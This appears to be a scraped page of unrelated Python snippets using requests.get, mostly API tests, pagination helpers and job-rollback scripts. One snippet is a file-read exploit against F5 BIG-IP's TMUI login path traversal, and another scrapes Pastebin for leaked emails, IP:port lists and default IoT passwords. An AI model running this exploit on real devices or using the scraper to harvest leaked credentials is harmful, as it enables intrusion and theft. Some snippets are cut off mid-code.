def setUp(self):
      self.api_url = "http://0.0.0.0:3000/api/"
      self.run_url = "http://0.0.0.0:3000/exec/"
      self.foundry_url = "http://0.0.0.0:3000/foundry/"

      login = GET("http://0.0.0.0:3000/login", params={"user":"", "password":""})
      self.headers = {  "Content-type": "application/json", "sessionkey": login.json()["sessionkey"] }
Пример #2
0
    def test_foundry_api(self):
        headers = self.headers
        url = self.foundry_url

        res = GET(url + "inventory/ecoli", headers=headers)
        self.assertTrue(res.status_code == 200)
        res = res.json()
        self.assertTrue(len(res["blocks"]) > 4000)
Пример #3
0
 def filterData(self, data: requests.get) -> int:
     """Filters data from requests into image names and ids and writes them into logfile"""
     ids, imageNames = [[str(n["id"]) for n in data.json()["items"]],
                        [n["image"] for n in data.json()["items"]]]
     for images in imageNames:
         self.queue.put(images)
     self.writeLogfile(ids, imageNames)
     return int(ids[-1])
Пример #4
0
def status_checker(req: requests.get):
    if req.status_code == requests.status_codes.codes.ok:
        return True
    elif 400 <= req.status_code <= 599:
        # raise the error if there is a bad response - 4XX or 5XX codes
        req.raise_for_status()
    else:
        raise HttpError(req.status_code)
  def test_foundry_api(self):
    headers = self.headers
    url = self.foundry_url

    res = GET(url + "inventory/ecoli", headers=headers)
    self.assertTrue(res.status_code==200)
    res = res.json()
    self.assertTrue(len(res["blocks"]) > 4000)
def send_request(ip: str, filename: str) -> str:
    r = GET(
        f"https://{ip}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={filename}",
        verify=False)
    try:
        data = r.json()
        output = data["output"]
    except:
        #print("[-] Exploit Failed.")
        return
    #print("[+] Exploit Successfull.")
    return output
Пример #7
0
    def setUp(self):
        self.api_url = "http://0.0.0.0:3000/api/"
        self.run_url = "http://0.0.0.0:3000/exec/"
        self.foundry_url = "http://0.0.0.0:3000/foundry/"

        login = GET("http://0.0.0.0:3000/login",
                    params={
                        "user": "",
                        "password": ""
                    })
        self.headers = {
            "Content-type": "application/json",
            "sessionkey": login.json()["sessionkey"]
        }
Пример #8
0
def collect_things(endpoint):

    parameters = {"per_page": 100}

    response = GET(endpoint, parameters)

    link_headers = parseLinkHeader(response.headers)

    things = response.json()

    while 'next' in link_headers:
        response = GET(link_headers['next'], params=parameters)
        link_headers = parseLinkHeader(response.headers)
        things = things + response.json()

    return things
  def test_cloning(self):
    headers = self.headers
    url  = self.api_url

    proj1 = {
     "metadata": {
        "authors": [],
        "version": "0.0.0",
        "tags": {}
      },
      "components": [
      ],
      "settings": {}
    }

    res = POST(url + "project", data = json(proj1), headers=headers)
    pid1 = res.json()['id']

    res = POST(url + "clone/" + pid1, headers=headers)
    pid2 = res.json()['id']

    res = POST(url + "clone/" + pid2, headers=headers)
    pid3 = res.json()['id']

    res = POST(url + "clone/" + pid3, headers=headers)
    pid4 = res.json()['id']

    res = GET(url + "project/" + pid4, headers=headers)

    hist = GET(url + "ancestors/" + pid4, headers=headers)
    self.assertTrue(hist.status_code==200)

    hist = hist.json()
    self.assertTrue(len(hist)==3)
    self.assertTrue(hist[0]==pid3)
    self.assertTrue(hist[1]==pid2)
    self.assertTrue(hist[2]==pid1)

    child = GET(url + "descendants/" + pid1, headers=headers)
    self.assertTrue(child.status_code==200)
    child = child.json()

    self.assertTrue(len(child)==5)
    self.assertTrue(len(child['leaves'])==1)
Пример #10
0
    def test_cloning(self):
        headers = self.headers
        url = self.api_url

        proj1 = {
            "metadata": {
                "authors": [],
                "version": "0.0.0",
                "tags": {}
            },
            "components": [],
            "settings": {}
        }

        res = POST(url + "project", data=json(proj1), headers=headers)
        pid1 = res.json()['id']

        res = POST(url + "clone/" + pid1, headers=headers)
        pid2 = res.json()['id']

        res = POST(url + "clone/" + pid2, headers=headers)
        pid3 = res.json()['id']

        res = POST(url + "clone/" + pid3, headers=headers)
        pid4 = res.json()['id']

        res = GET(url + "project/" + pid4, headers=headers)

        hist = GET(url + "ancestors/" + pid4, headers=headers)
        self.assertTrue(hist.status_code == 200)

        hist = hist.json()
        self.assertTrue(len(hist) == 3)
        self.assertTrue(hist[0] == pid3)
        self.assertTrue(hist[1] == pid2)
        self.assertTrue(hist[2] == pid1)

        child = GET(url + "descendants/" + pid1, headers=headers)
        self.assertTrue(child.status_code == 200)
        child = child.json()

        self.assertTrue(len(child) == 5)
        self.assertTrue(len(child['leaves']) == 1)
Пример #11
0
def __getRunningJobs(batchsite):
    """ internal method to get running jobs """
    log = getLogger("script")
    res = Rget("%s/watchdog/" % DAMPE_WORKFLOW_URL, data={"site": str(batchsite)})
    res.raise_for_status()
    res = res.json()
    if not res.get("result", "nok") == "ok":
        log.error(res.get("error"))
        return []
    jobs = res.get("jobs")
    return jobs
Пример #12
0
from whoohoo import *
from requests import get as GET

translator = WhooHooTranslator(WhooHooTranslatorType.scottie)
bee_movie_script = GET("https://pastebin.com/raw/UfFEq7ei").content.decode()
bee_movie_script = bee_movie_script.replace('\r\n  \r\n', '')
translator.translate_to_file(
    bee_movie_script, 'bee movie script but it\'s in a scottish dialect.txt')
Пример #13
0
    ':admin', ':1234', 'xc3511', 'GMB182', 'Zte521', 'vizxv', 'oelinux123',
    'jauntech'
]
passwords = "(.*" + ".*)|(.*".join(passwords) + ".*)"

justOnce = True

Zzz = 240
while True:
    try:
        pois = []
        urls = read()
        for url in urls:
            file = 'https://pastebin.com/raw%s' % url
            print file
            text = GET(file).content

            # check for email addresses
            emails = re.findall(r'[\w\.-]+@[\w\.-]+', text)
            if len(emails) > 20:
                print 'Email addresses'
                pois.append((
                    file,
                    'email',
                    text.encode('UTF-8'),
                ))
                continue

            # check for ip addresses followed by a port
            found = re.findall(
                r'(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3}:)',
Пример #14
0
def main(args=None):
    usage = "Usage: %(prog)s JobName [options]"
    description = "roll-back Jobs in DB"
    parser = ArgumentParser(usage=usage, description=description)
    parser.add_argument("--title", dest="title", type=str, default=None, help='name of job, required!', required=True)
    parser.add_argument("--type", dest="type", type=str, default="Generation", help='type of job, required!',
                        required=False)
    parser.add_argument("--instance", dest="inst", type=int, default=None,
                        help='to roll back specific instance', required=False)
    parser.add_argument("--status", dest="stat", type=str, default="Failed",
                        help='jobs to be picked for roll-back, Any will return all statii!', required=False)
    parser.add_argument("--n_min", dest="n_min", type=int, default=None, help='roll back everything above this number',
                        required=False)
    parser.add_argument("--n_max", dest="n_max", type=int, default=None, help='roll back everything below this number',
                        required=False)
    parser.add_argument("--set-var", dest="set_var", type=str, default=None,
                        help="set variables for streams, format is key1=value1;key2=value2, separate by ;")
    opts = parser.parse_args(args)
    if opts.n_min is None and opts.n_max is None and opts.inst is None and opts.stat == "Any":
        q = query_yes_no("WARNING: you are requesting to roll back all instances of job %s.\
                        \nThis query may take a while to be completed, are you sure?" % opts.title)
        if not q:
            print 'rollback aborted'
            sys_exit()
    if not (opts.n_min is None and opts.n_max is None):
        _range = opts.n_max - opts.n_min
        if _range > 100: print 'WARNING: you are querying more than 100 jobs, this may take a while to complete'
    override_dict = {"InputFiles": [], "OutputFiles": [], "MetaData": []}
    if opts.set_var is not None:
        var_dict = dict({tuple(val.split("=")) for val in opts.set_var.split(";")})
        override_dict['MetaData'] = [{"name": k, "value": v, "var_type": "string"} for k, v in var_dict.iteritems()]
    my_dict = {}
    for key in opts.__dict__:
        if opts.__dict__[key] is not None:
            my_dict[key] = opts.__dict__[key]
    if 'set_var' in my_dict: del my_dict['set_var']
    # get all jobs to roll back.
    res = Rget("%s/jobstatus/" % DAMPE_WORKFLOW_URL, data=my_dict)
    res.raise_for_status()
    res = res.json()
    if res.get("result", "nok") != "ok":
        print "error %s" % res.get("error")
    jobs = res.get("jobs")
    if len(jobs):
        print 'found %i jobs that satisfy query conditions.' % len(jobs)
        if query_yes_no("continue rolling back %i instances?" % len(jobs)):
            for j in jobs:
                my_dict = {"t_id": j['jobId'], "inst_id": j['instanceId'],
                           "major_status": "New", "minor_status": "AwaitingBatchSubmission", "hostname": None,
                           "batchId": None, "status_history": [], "body": str(override_dict),
                           "log": "", "cpu": [], "memory": [], "created_at": "Now"}
                res = post("%s/jobstatus/" % DAMPE_WORKFLOW_URL, data={"args": dumps(my_dict)})
                res.raise_for_status()
                res = res.json()
                if not res.get("result", "nok") == "ok":
                    print ("error resetting instance %s" % res.get("error"))
            print 'rolled back %i instances' % len(jobs)
        else:
            print 'rollback aborted'
            sys_exit()
    else:
        print 'could not find any jobs satisfying the query.'
        sys_exit()